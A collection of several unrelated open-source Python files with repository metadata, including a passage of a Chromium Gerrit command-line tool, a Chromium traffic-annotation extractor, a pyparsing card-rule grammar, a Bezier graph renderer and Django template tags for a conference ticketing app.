class ActionLabelCommitQueue(_ActionLabeler):
"""Change the Commit-Queue label (1=dry-run 2=commit)"""
COMMAND = 'label-cq'
LABEL = 'Commit-Queue'
VALUES = ('0', '1', '2')
class _ActionSimpleParallelCLs(UserAction):
"""Base helper for actions that only accept CLs."""
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
parser.add_argument('cls', nargs='+', metavar='CL',
help='The CL(s) to update')
def __call__(self, opts):
"""Implement the action."""
def task(arg):
helper, cl = GetGerrit(opts, arg)
self._process_one(helper, cl, opts)
_run_parallel_tasks(task, *opts.cls)
class ActionSubmit(_ActionSimpleParallelCLs):
"""Submit CLs"""
COMMAND = 'submit'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SubmitChange(cl, dryrun=opts.dryrun)
class ActionAbandon(_ActionSimpleParallelCLs):
"""Abandon CLs"""
COMMAND = 'abandon'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.AbandonChange(cl, dryrun=opts.dryrun)
class ActionRestore(_ActionSimpleParallelCLs):
"""Restore CLs that were abandoned"""
COMMAND = 'restore'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.RestoreChange(cl, dryrun=opts.dryrun)
class ActionReviewers(UserAction):
"""Add/remove reviewers' emails for a CL (prepend with '~' to remove)"""
COMMAND = 'reviewers'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
parser.add_argument('--ne', '--no-emails', dest='notify',
default='ALL', action='store_const', const='NONE',
help='Do not send e-mail notifications')
parser.add_argument('cl', metavar='CL',
help='The CL to update')
parser.add_argument('reviewers', nargs='+',
help='The reviewers to add/remove')
@staticmethod
def __call__(opts):
"""Implement the action."""
# Allow for optional leading '~'.
email_validator = re.compile(r'^[~]?%s$' % constants.EMAIL_REGEX)
add_list, remove_list, invalid_list = [], [], []
for email in opts.reviewers:
if not email_validator.match(email):
invalid_list.append(email)
elif email[0] == '~':
remove_list.append(email[1:])
else:
add_list.append(email)
if invalid_list:
cros_build_lib.Die(
'Invalid email address(es): %s' % ', '.join(invalid_list))
if add_list or remove_list:
helper, cl = GetGerrit(opts, opts.cl)
helper.SetReviewers(cl, add=add_list, remove=remove_list,
dryrun=opts.dryrun, notify=opts.notify)
class ActionAssign(_ActionSimpleParallelCLs):
"""Set the assignee for CLs"""
COMMAND = 'assign'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSimpleParallelCLs.init_subparser(parser)
parser.add_argument('assignee',
help='The new assignee')
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SetAssignee(cl, opts.assignee, dryrun=opts.dryrun)
class ActionMessage(_ActionSimpleParallelCLs):
"""Add a message to a CL"""
COMMAND = 'message'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSimpleParallelCLs.init_subparser(parser)
parser.add_argument('message',
help='The message to post')
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SetReview(cl, msg=opts.message, dryrun=opts.dryrun)
class ActionTopic(_ActionSimpleParallelCLs):
"""Set a topic for one or more CLs"""
COMMAND = 'topic'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
_ActionSimpleParallelCLs.init_subparser(parser)
parser.add_argument('topic',
help='The topic to set')
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SetTopic(cl, opts.topic, dryrun=opts.dryrun)
class ActionPrivate(_ActionSimpleParallelCLs):
"""Mark CLs private"""
COMMAND = 'private'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SetPrivate(cl, True, dryrun=opts.dryrun)
class ActionPublic(_ActionSimpleParallelCLs):
"""Mark CLs public"""
COMMAND = 'public'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.SetPrivate(cl, False, dryrun=opts.dryrun)
class ActionSethashtags(UserAction):
"""Add/remove hashtags on a CL (prepend with '~' to remove)"""
COMMAND = 'hashtags'
@staticmethod
def init_subparser(parser):
"""Add arguments to this action's subparser."""
parser.add_argument('cl', metavar='CL',
help='The CL to update')
parser.add_argument('hashtags', nargs='+',
help='The hashtags to add/remove')
@staticmethod
def __call__(opts):
"""Implement the action."""
add = []
remove = []
for hashtag in opts.hashtags:
if hashtag.startswith('~'):
remove.append(hashtag[1:])
else:
add.append(hashtag)
helper, cl = GetGerrit(opts, opts.cl)
helper.SetHashtags(cl, add, remove, dryrun=opts.dryrun)
class ActionDeletedraft(_ActionSimpleParallelCLs):
"""Delete draft CLs"""
COMMAND = 'deletedraft'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.DeleteDraft(cl, dryrun=opts.dryrun)
class ActionReviewed(_ActionSimpleParallelCLs):
"""Mark CLs as reviewed"""
COMMAND = 'reviewed'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.ReviewedChange(cl, dryrun=opts.dryrun)
class ActionUnreviewed(_ActionSimpleParallelCLs):
"""Mark CLs as unreviewed"""
COMMAND = 'unreviewed'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.UnreviewedChange(cl, dryrun=opts.dryrun)
class ActionIgnore(_ActionSimpleParallelCLs):
"""Ignore CLs (suppress notifications/dashboard/etc...)"""
COMMAND = 'ignore'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.IgnoreChange(cl, dryrun=opts.dryrun)
class ActionUnignore(_ActionSimpleParallelCLs):
"""Unignore CLs (enable notifications/dashboard/etc...)"""
COMMAND = 'unignore'
@staticmethod
def _process_one(helper, cl, opts):
"""Use |helper| to process the single |cl|."""
helper.UnignoreChange(cl, dryrun=opts.dryrun)
class ActionAccount(UserAction):
"""Get the current user account information"""
COMMAND = 'account'
@staticmethod
def __call__(opts):
"""Implement the action."""
helper, _ = GetGerrit(opts)
acct = helper.GetAccount()
if opts.json:
json.dump(acct, sys.stdout)
else:
print('account_id:%i %s <%s>' %
(acct['_account_id'], acct['name'], acct['email']))
@memoize.Memoize
def _GetActions():
"""Get all the possible actions we support.
Returns:
An ordered dictionary mapping the user subcommand (e.g. "foo") to the
function that implements that command (e.g. UserActFoo).
"""
VALID_NAME = re.compile(r'^[a-z][a-z-]*[a-z]$')
actions = {}
for cls in globals().values():
if (not inspect.isclass(cls) or
not issubclass(cls, UserAction) or
not getattr(cls, 'COMMAND', None)):
continue
# Sanity check names for devs adding new commands. Should be quick.
cmd = cls.COMMAND
assert VALID_NAME.match(cmd), '"%s" must match [a-z-]+' % (cmd,)
assert cmd not in actions, 'multiple "%s" commands found' % (cmd,)
actions[cmd] = cls
return collections.OrderedDict(sorted(actions.items()))
def _GetActionUsages():
"""Formats a one-line usage and doc message for each action."""
actions = _GetActions()
cmds = list(actions.keys())
functions = list(actions.values())
usages = [getattr(x, 'usage', '') for x in functions]
docs = [x.__doc__.splitlines()[0] for x in functions]
cmd_indent = len(max(cmds, key=len))
usage_indent = len(max(usages, key=len))
return '\n'.join(
' %-*s %-*s : %s' % (cmd_indent, cmd, usage_indent, usage, doc)
for cmd, usage, doc in zip(cmds, usages, docs)
)
def GetParser():
"""Returns the parser to use for this module."""
description = """\
There is no support for doing line-by-line code review via the command line.
This helps you manage various bits and CL status.
For general Gerrit documentation, see:
https://gerrit-review.googlesource.com/Documentation/
The Searching Changes page covers the search query syntax:
https://gerrit-review.googlesource.com/Documentation/user-search.html
Example:
$ gerrit todo # List all the CLs that await your review.
$ gerrit mine # List all of your open CLs.
$ gerrit inspect 28123 # Inspect CL 28123 on the public gerrit.
$ gerrit inspect *28123 # Inspect CL 28123 on the internal gerrit.
$ gerrit label-v 28123 1 # Mark CL 28123 as verified (+1).
$ gerrit reviewers 28123 foo@chromium.org # Add foo@ as a reviewer on CL \
28123.
$ gerrit reviewers 28123 ~foo@chromium.org # Remove foo@ as a reviewer on \
CL 28123.
Scripting:
$ gerrit label-cq `gerrit --raw mine` 1 # Mark *ALL* of your public CLs \
with Commit-Queue=1.
$ gerrit label-cq `gerrit --raw -i mine` 1 # Mark *ALL* of your internal \
CLs with Commit-Queue=1.
$ gerrit --json search 'assignee:self' # Dump all pending CLs in JSON.
Actions:
"""
description += _GetActionUsages()
actions = _GetActions()
site_params = config_lib.GetSiteParams()
parser = commandline.ArgumentParser(description=description)
parser.add_argument('-i', '--internal', dest='gob', action='store_const',
default=site_params.EXTERNAL_GOB_INSTANCE,
const=site_params.INTERNAL_GOB_INSTANCE,
help='Query internal Chromium Gerrit instance')
parser.add_argument('-g', '--gob',
default=site_params.EXTERNAL_GOB_INSTANCE,
help=('Gerrit (on borg) instance to query (default: %s)' %
(site_params.EXTERNAL_GOB_INSTANCE)))
parser.add_argument('--raw', default=False, action='store_true',
help='Return raw results (suitable for scripting)')
parser.add_argument('--json', default=False, action='store_true',
help='Return results in JSON (suitable for scripting)')
parser.add_argument('-n', '--dry-run', default=False, action='store_true',
dest='dryrun',
help='Show what would be done, but do not make changes')
parser.add_argument('-v', '--verbose', default=False, action='store_true',
help='Be more verbose in output')
# Subparsers are required by default under Python 2. Python 3 changed to
# not required, but didn't include a required option until 3.7. Setting
# the required member works in all versions (and setting dest name).
subparsers = parser.add_subparsers(dest='action')
subparsers.required = True
for cmd, cls in actions.items():
# Format the full docstring by removing the file level indentation.
description = re.sub(r'^ ', '', cls.__doc__, flags=re.M)
subparser = subparsers.add_parser(cmd, description=description)
subparser.add_argument('-n', '--dry-run', dest='dryrun',
default=False, action='store_true',
help='Show what would be done only')
cls.init_subparser(subparser)
return parser
def main(argv):
parser = GetParser()
opts = parser.parse_args(argv)
# A cache of gerrit helpers we'll load on demand.
opts.gerrit = {}
opts.Freeze()
# pylint: disable=global-statement
global COLOR
COLOR = terminal.Color(enabled=opts.color)
# Now look up the requested user action and run it.
actions = _GetActions()
obj = actions[opts.action]()
try:
obj(opts)
except (cros_build_lib.RunCommandError, gerrit.GerritException,
gob_util.GOBError) as e:
cros_build_lib.Die(e)
|
{
"content_hash": "8da5b054f4f55ff2672676485fa342bb",
"timestamp": "",
"source": "github",
"line_count": 923,
"max_line_length": 80,
"avg_line_length": 30.63163596966414,
"alnum_prop": 0.6365083295016447,
"repo_name": "endlessm/chromium-browser",
"id": "5b4d741daad36373d47eab8c8b7ec5fc197efdf4",
"size": "28467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/chromite/scripts/gerrit.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from pyparsing import *
from decl import *
from ..keywords.deff import keywords
from ...constants.articles.deff import EACH
from ...constants.connectors.deff import IF
from ...constants.modifiers.deff import ABLE
from ...constants.prepositions.deff import UNTIL, OF
from ...constants.verbs.deff import HAVE, GET, BE, GAIN, CONTROL, CANT, MUST, ATTACK, BLOCK
from ...constants.timing.deff import TURN, UPKEEP, DRAWSTEP, PRECOMBAT, COMBAT, POSCOMBAT, END
from ...entities.subjects.deff import subjects, objects
from ...functions.deff import delimitedListAnd
from ...ptl.deff import ptmod
#thisturn << THIS + TURN
until << UNTIL + END + OF + TURN
# add as-long-as clause
# remember it can go before or after the effect
havekeywords << HAVE + delimitedListAnd(keywords)
getptmod << GET + ptmod
gaincontrol << GAIN + CONTROL + OF + objects
#attack << ATTACK
#block << BLOCK
# one of the cases where "or" means "both" and not "option", beware!
#cantattackorblock << CANT + delimitedListOr(attack|block)
# add "can't be blocked [by X]"
#mustattack << MUST + ATTACK + EACH + TURN
#mustbeblocked << MUST + BE + BLOCK
property_ << (
havekeywords
| getptmod
| gaincontrol
#| cantattackorblock
#| mustattack
)
properties << delimitedListAnd(property_)
continuous << subjects + properties + Optional(until)#+ ZeroOrMore(until|thisturn|ifable)
|
{
"content_hash": "48933de35ddac19d4c2adf5f1f051910",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 94,
"avg_line_length": 29.26086956521739,
"alnum_prop": 0.736255572065379,
"repo_name": "jrgdiz/cardwalker",
"id": "8826a65686d46cf51d0a8c6ea371c88d1cbf07a1",
"size": "1346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grammar/rules/continuous/deff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "49118"
},
{
"name": "Shell",
"bytes": "2228"
}
],
"symlink_target": ""
}
|
from gruffy import base
from pgmagick import Coordinate, CoordinateList, DrawableBezier, \
DrawableFillColor, DrawableFillOpacity, DrawableList, \
DrawableStrokeColor, DrawableStrokeWidth
class Bezier(base.Base):
"""Bezier Graph Object"""
def draw(self):
Bezier.__base__.draw(self)
if not self.has_gdata:
return
self._draw_bezier()
def _draw_bezier(self):
self.x_increment = self.graph_width / float(self.column_count - 1)
dl = DrawableList()
for data_row in self.norm_data:
poly_points = CoordinateList()
dl.append(DrawableFillColor(data_row['color']))
for index, data_point in enumerate(data_row['values']):
# Use incremented x and scaled y
new_x = self.graph_left + (self.x_increment * index)
new_y = self.graph_top + (
self.graph_height - data_point * self.graph_height)
if index == 0:
poly_points.append(Coordinate(self.graph_left, self.graph_bottom - 1))
poly_points.append(Coordinate(new_x, new_y))
self.draw_label(new_x, index)
dl.append(DrawableFillOpacity(0.0))
dl.append(DrawableStrokeColor(data_row['color']))
dl.append(DrawableStrokeWidth(self.clip_value_if_greater_than(self.columns / (len(self.norm_data[0]['values']) * 4), 5.0)))
dl.append(DrawableBezier(poly_points))
self.base_image.draw(dl)
|
{
"content_hash": "b400ed464bc9101071463c3329d178a6",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 135,
"avg_line_length": 42.108108108108105,
"alnum_prop": 0.5860077021822849,
"repo_name": "hhatto/gruffy",
"id": "31c791c0bc919bc8525cf428ae67bdecd864e5b6",
"size": "1558",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gruffy/bezier.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "95127"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Extracts network traffic annotation definitions from C++ source code.
"""
from __future__ import print_function
import argparse
import os
import re
import sys
import traceback
from annotation_tools import NetworkTrafficAnnotationTools
from annotation_tokenizer import Tokenizer, CppParsingError
# Exit code for parsing errors. Other runtime errors return 1.
EX_PARSE_ERROR = 2
ANNOTATION_TYPES = {
'DefineNetworkTrafficAnnotation': 'Definition',
'DefinePartialNetworkTrafficAnnotation': 'Partial',
'CompleteNetworkTrafficAnnotation': 'Completing',
'BranchedCompleteNetworkTrafficAnnotation': 'BranchedCompleting',
'CreateMutableNetworkTrafficAnnotationTag': 'Mutable',
}
# Regex that matches an annotation definition.
CALL_DETECTION_REGEX = re.compile(r'''
\b
# Look for one of the tracked function names.
# Capture group 1.
(
''' + ('|'.join(ANNOTATION_TYPES.keys())) + r'''
)
# Followed by a left-paren.
\s*
\(
''', re.VERBOSE | re.DOTALL)
# Regex that matches an annotation that should only be used in test files.
TEST_ANNOTATION_REGEX = re.compile(
r'\b(PARTIAL_)?TRAFFIC_ANNOTATION_FOR_TESTS\b')
# Regex that matches a placeholder annotation for a few whitelisted files.
MISSING_ANNOTATION_REGEX = re.compile(r'\bMISSING_TRAFFIC_ANNOTATION\b')
class Annotation:
"""A network annotation definition in C++ code."""
def __init__(self, file_path, line_number, type_name='', unique_id='',
extra_id='', text=''):
"""Constructs an Annotation object with the given field values.
Args:
file_path: Path to the file that contains this annotation.
"""
self.file_path = file_path
self.line_number = line_number
self.type_name = type_name
self.unique_id = unique_id
self.extra_id = extra_id
self.text = text
def parse_definition(self, re_match):
"""Parses the annotation and populates object fields.
Args:
file_path: Path to the file that contains this annotation.
re_match: A MatchObject obtained from CALL_DETECTION_REGEX.
"""
definition_function = re_match.group(1)
self.type_name = ANNOTATION_TYPES[definition_function]
# Parse the arguments given to the definition function, populating
# |unique_id|, |text| and (possibly) |extra_id|.
body = re_match.string[re_match.end():]
self._parse_body(body)
def extractor_output_string(self):
"""Returns a string formatted for output."""
return "\n".join(map(str, [
"==== NEW ANNOTATION ====",
self.file_path,
self.line_number,
self.type_name,
self.unique_id,
self.extra_id,
self.text,
"==== ANNOTATION ENDS ====",
]))
def _parse_body(self, body):
"""Tokenizes and parses the arguments given to the definition function."""
# Don't bother parsing CreateMutableNetworkTrafficAnnotationTag(), we don't
# care about its arguments anyways.
if self.type_name == 'Mutable':
return
tokenizer = Tokenizer(body, self.file_path, self.line_number)
# unique_id
self.unique_id = tokenizer.advance('string_literal')
tokenizer.advance('comma')
# extra_id (Partial/BranchedCompleting)
if self.type_name == 'Partial' or self.type_name == 'BranchedCompleting':
self.extra_id = tokenizer.advance('string_literal')
tokenizer.advance('comma')
# partial_annotation (Completing/BranchedCompleting)
if self.type_name == 'Completing' or self.type_name == 'BranchedCompleting':
# Skip the |partial_annotation| argument. It can be a variable_name, or a
# FunctionName(), so skip the parentheses if they're there.
tokenizer.advance('symbol')
if tokenizer.maybe_advance('left_paren'):
tokenizer.advance('right_paren')
tokenizer.advance('comma')
# proto text
self.text = tokenizer.advance('string_literal')
# The function call should end here without any more arguments.
assert tokenizer.advance('right_paren')
def get_line_number_at(string, pos):
"""Find the line number for the char at position |pos|. 1-indexed."""
# This is inefficient: O(n). But we only run it once for each annotation
# definition, so the effect on total runtime is negligible.
return 1 + len(re.compile(r'\n').findall(string[:pos]))
def is_inside_comment(string, pos):
"""Checks if the position |pos| within string seems to be inside a comment.
This is a bit naive. Only checks for single-line comments (// ...), not block
comments (/* ... */).
Args:
string: string to scan.
pos: position within the string.
Returns:
True if |string[pos]| looks like it's inside a C++ comment.
"""
# Look for "//" on the same line in the reversed string.
return bool(re.match(r'[^\n]*//', string[pos::-1]))
# TODO(crbug/966883): Add multi-line comment support.
def extract_annotations(file_path):
"""Extracts and returns annotations from the file at |file_path|."""
with open(file_path) as f:
contents = f.read()
defs = []
# Check for function calls (e.g. DefineNetworkTrafficAnnotation(...))
for re_match in CALL_DETECTION_REGEX.finditer(contents):
if is_inside_comment(re_match.string, re_match.start()):
continue
line_number = get_line_number_at(contents, re_match.start())
annotation = Annotation(file_path, line_number)
annotation.parse_definition(re_match)
defs.append(annotation)
# Check for test annotations (e.g. TRAFFIC_ANNOTATION_FOR_TESTS)
for re_match in TEST_ANNOTATION_REGEX.finditer(contents):
if is_inside_comment(re_match.string, re_match.start()):
continue
line_number = get_line_number_at(contents, re_match.start())
is_partial = bool(re_match.group(1))
if is_partial:
type_name = 'Partial'
unique_id = 'test_partial'
extra_id = 'test'
else:
type_name = 'Definition'
unique_id = 'test'
extra_id = ''
annotation = Annotation(
file_path, line_number, type_name=type_name,
unique_id=unique_id, extra_id=extra_id,
text='Traffic annotation for unit, browser and other tests')
defs.append(annotation)
# Check for MISSING_TRAFFIC_ANNOTATION.
for re_match in MISSING_ANNOTATION_REGEX.finditer(contents):
if is_inside_comment(re_match.string, re_match.start()):
continue
line_number = get_line_number_at(contents, re_match.start())
annotation = Annotation(
file_path, line_number, type_name='Definition', unique_id='missing',
text='Function called without traffic annotation.')
defs.append(annotation)
return defs
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--options-file',
help='optional file to read options from')
args, argv = parser.parse_known_args()
if args.options_file:
argv = open(args.options_file).read().split()
parser.add_argument(
'--build-path',
help='Specifies a compiled build directory, e.g. out/Debug.')
parser.add_argument(
'--generate-compdb', action='store_true',
help='Generate a new compile_commands.json before running')
parser.add_argument(
'--no-filter', action='store_true',
help='Do not filter files based on compdb entries')
parser.add_argument(
'file_paths', nargs='+', help='List of files to process.')
args = parser.parse_args(argv)
tools = NetworkTrafficAnnotationTools(args.build_path)
compdb_files = tools.GetCompDBFiles(args.generate_compdb)
annotation_definitions = []
# Parse all the files.
# TODO(crbug/966883): Do this in parallel.
for file_path in args.file_paths:
if not args.no_filter and os.path.abspath(file_path) not in compdb_files:
continue
try:
annotation_definitions.extend(extract_annotations(file_path))
except CppParsingError:
traceback.print_exc()
return EX_PARSE_ERROR
# Print output.
for annotation in annotation_definitions:
print(annotation.extractor_output_string())
# If all files were successfully checked for annotations but none of them had
# any, print something so that the traffic_annotation_auditor knows there was
# no error so that the files get checked for deleted annotations.
if not annotation_definitions:
print('No annotations in these files.')
return 0
if '__main__' == __name__:
sys.exit(main())
|
{
"content_hash": "437eaccc5cd7ec2ff3868816a1c3bbd2",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 80,
"avg_line_length": 32.70498084291188,
"alnum_prop": 0.6836925960637301,
"repo_name": "endlessm/chromium-browser",
"id": "b239ffc25dbe79b2206bdbfb8cd0fa6a218a665f",
"size": "8536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/traffic_annotation/scripts/extractor.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from assopy import models
from assopy import settings
from django import forms
from django import template
from django.conf import settings as dsettings
from django.core import paginator
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
import urllib
register = template.Library()
_field_template_standard = template.Template("""
<div class="{{ classes }}">
<label for="{{ field.auto_id }}">{{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_label_inline = template.Template("""
<div class="{{ classes }}">
<label for="{{ field.auto_id }}">{{ field }} {{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_input_list = template.Template("""
<div class="{{ classes }}">
<label>{{ field.label|safe }}{% if field.field.required %}<span class="required">{{ required_text }}</span>{% endif %}</label>
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
_field_template_no_label = template.Template("""
<div class="{{ classes }}">
{{ field }}
{% if field.help_text %}<div class="help-text">{{ field.help_text|safe }}</div>{% endif %}
{{ field.errors }}
</div>
""")
fields_template = {
None: _field_template_standard,
forms.widgets.CheckboxInput: _field_template_label_inline,
forms.widgets.RadioSelect: _field_template_input_list,
'no_label': _field_template_no_label,
}
@register.filter()
def field(field, cls=None):
if not hasattr(field, 'field'):
return 'Invalid field "%r"' % field
tpl_key = None
extra = []
if cls:
extra = cls.split(None)
for v in cls.split(None):
if v.startswith('tpl:'):
tpl_key = v[4:]
else:
extra.append(v)
classes = [ 'field' ]
if field.field.required:
classes.append('required')
classes.extend(extra)
classes.append(field.field.__class__.__name__.lower())
if field.errors:
classes.append('error')
widget = field.field.widget
if isinstance(widget, (forms.HiddenInput,)):
return str(field)
else:
if not tpl_key:
tpl_key = type(widget)
try:
tpl = fields_template[tpl_key]
except KeyError:
tpl = fields_template[None]
ctx = {
'classes': ' '.join(classes),
'field': field,
'required_text': _('(required)'),
}
return tpl.render(template.Context(ctx))
_form_errors_tpl = template.Template("""
{% load i18n %}
<div class="error-notice">
{% if form.non_field_errors %}
{% for e in form.non_field_errors %}
<div>↓ {{ e }}</div>
{% endfor %}
{% else %}
<div>↓ {% trans "Warning, check your data on the form below" %}</div>
{% endif %}
</div>
""")
@register.filter()
def form_errors(form, cls=None):
if not form.errors:
return ''
classes = [ 'error-notice' ]
return _form_errors_tpl.render(template.Context(locals()))
# in django 1.3 questo filtro non serve più, si potrà usare direttamente
# field.value
# http://code.djangoproject.com/ticket/10427
@register.filter
def field_value(field):
"""
Returns the value for this BoundField, as rendered in widgets.
"""
if field.form.is_bound:
if isinstance(field.field, forms.FileField) and field.data is None:
val = field.form.initial.get(field.name, field.field.initial)
else:
val = field.data
else:
val = field.form.initial.get(field.name, field.field.initial)
if callable(val):
val = val()
if val is None:
val = ''
return val
@register.filter
def field_display_value(field):
val = field_value(field)
if hasattr(field.field, 'choices'):
data = dict(field.field.choices)
if isinstance(field.field, (forms.MultipleChoiceField,)):# forms.TypedMultipleChoiceField)):
output = []
for x in val:
output.append(data.get(x, ''))
else:
output = data.get(val, '')
val = output
return val
@register.filter
def field_widget(field, attrs):
attrs = dict(map(lambda _: _.strip(), x.split('=')) for x in attrs.split(','))
field.field.widget.attrs.update(attrs)
return field
@register.filter
def as_range(value):
return range(value)
@register.inclusion_tag('assopy/render_janrain_box.html', takes_context=True)
def render_janrain_box(context, next=None, mode='embed'):
if settings.JANRAIN:
# mi salvo, nella sessione corrente, dove vuol essere rediretto
# l'utente una volta loggato
if next:
context['request'].session['jr_next'] = next
domain = settings.JANRAIN['domain']
if not domain.endswith('/'):
domain += '/'
u = '%sopenid/embed?token_url=%s' % (domain, urllib.quote_plus(dsettings.DEFAULT_URL_PREFIX + reverse('assopy-janrain-token')))
else:
u = None
return {
'url': u,
'mode': mode,
}
class TNode(template.Node):
def _set_var(self, v):
if not v:
return v
if v.startswith('"') and v.endswith('"'):
return v[1:-1]
else:
return template.Variable(v)
def _get_var(self, v, context):
try:
return v.resolve(context)
except AttributeError:
return v
def _get_cached_order_status(request, order_id):
try:
cache = request._order_cache
except AttributeError:
cache = request._order_cache = {}
if order_id not in cache:
cache[order_id] = models.Order.objects.get(pk=order_id).complete()
return cache[order_id]
@register.tag
def order_complete(parser, token):
"""
{% order_complete order_id as var %}
Equivalente a `Order.objects.get(id=order_id).complete()` ma memorizza il
risultato in una cache che dura quanto la richiesta corrente.
"""
contents = token.split_contents()
tag_name = contents[0]
if contents[-2] != 'as':
raise template.TemplateSyntaxError("%r tag had invalid arguments" %tag_name)
var_name = contents[-1]
order_id = contents[1]
class Node(template.Node):
def __init__(self, order_id, var_name):
self.order_id = template.Variable(order_id)
self.var_name = var_name
def render(self, context):
try:
order_id = self.order_id.resolve(context)
except AttributeError:
complete = False
else:
request = context.get('request')
if request:
complete = _get_cached_order_status(request, order_id)
else:
complete = models.Order.objects.get(id=order_id).complete()
context[self.var_name] = complete
return ''
return Node(order_id, var_name)
@register.filter()
def include_payment(order, type):
return order.orderitem_set.filter(ticket__fare__payment_type=type).exists()
@register.filter()
def include_fare(order, codes):
return order.orderitem_set.filter(ticket__fare__code__in=codes.split(',')).exists()
@register.filter
def user_coupons(user):
output = {'valid': [], 'invalid': []}
for c in user.coupon_set.all():
if c.valid(user):
output['valid'].append(c)
else:
output['invalid'].append(c)
return output
@register.inclusion_tag('assopy/render_profile_last_block.html', takes_context=True)
def render_profile_last_block(context):
return context
@register.simple_tag(takes_context=True)
def paginate(context, qs, count=20):
pages = paginator.Paginator(qs, int(count))
try:
ix = int(context['request'].GET.get('page', 1))
except ValueError:
ix = 1
try:
return pages.page(ix)
except:
ix = 1 if ix < 1 else pages.num_pages
return pages.page(ix)
@register.simple_tag(takes_context=True)
def add_page_number_to_query(context, page, get=None):
if get is None:
get = context['request'].GET.copy()
else:
get = dict(get)
get['page'] = page
return urllib.urlencode(get)
@register.inclusion_tag('assopy/render_voucher.html', takes_context=True)
def render_voucher(context, item):
return {
'item': item,
}
@register.assignment_tag(takes_context=True)
def orderitem_can_be_refunded(context, item):
req = context['request']
try:
d = req.session['doppelganger']
except KeyError:
user = context['user']
else:
from django.contrib.auth.models import User
user = User.objects.get(id=d[0])
return settings.ORDERITEM_CAN_BE_REFUNDED(user, item)
|
{
"content_hash": "180da1d7450ea9e54ce14e4e7a69b5ca",
"timestamp": "",
"source": "github",
"line_count": 298,
"max_line_length": 172,
"avg_line_length": 31.14765100671141,
"alnum_prop": 0.5985778926955397,
"repo_name": "barrachri/epcon",
"id": "6100ced99685f41e8cdcd252829c945d6c36cc10",
"size": "9312",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "assopy/templatetags/assopy_tags.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "ASP",
"bytes": "1490"
},
{
"name": "CSS",
"bytes": "4751434"
},
{
"name": "HTML",
"bytes": "2177936"
},
{
"name": "JavaScript",
"bytes": "3465605"
},
{
"name": "Makefile",
"bytes": "3338"
},
{
"name": "PHP",
"bytes": "4506"
},
{
"name": "Python",
"bytes": "1255065"
},
{
"name": "Ruby",
"bytes": "1870"
},
{
"name": "Shell",
"bytes": "1679"
},
{
"name": "XSLT",
"bytes": "5122"
}
],
"symlink_target": ""
}
|
import os, pathlib
DIR = os.listdir(str(pathlib.Path(__file__).parent))
COMMANDS = [i[:-3] for i in DIR if i.endswith('.py') and not i.startswith('_')]
COMMANDS_LINES = COMMANDS[0:8], COMMANDS[8:]
COMMANDS_PRINTABLE = '\n'.join(', '.join(i) for i in COMMANDS_LINES)
|
{
"content_hash": "37f5dbf15dcb46d93c42657df96d5cb1",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 79,
"avg_line_length": 44.5,
"alnum_prop": 0.6666666666666666,
"repo_name": "ManiacalLabs/BiblioPixel",
"id": "0704a5087d9a7db2c3bc4478542f228ee78e9a0c",
"size": "267",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bibliopixel/commands/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20651"
},
{
"name": "HTML",
"bytes": "3310"
},
{
"name": "JavaScript",
"bytes": "5140"
},
{
"name": "Python",
"bytes": "674175"
},
{
"name": "Shell",
"bytes": "2973"
}
],
"symlink_target": ""
}
|
"""
MINDBODY Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
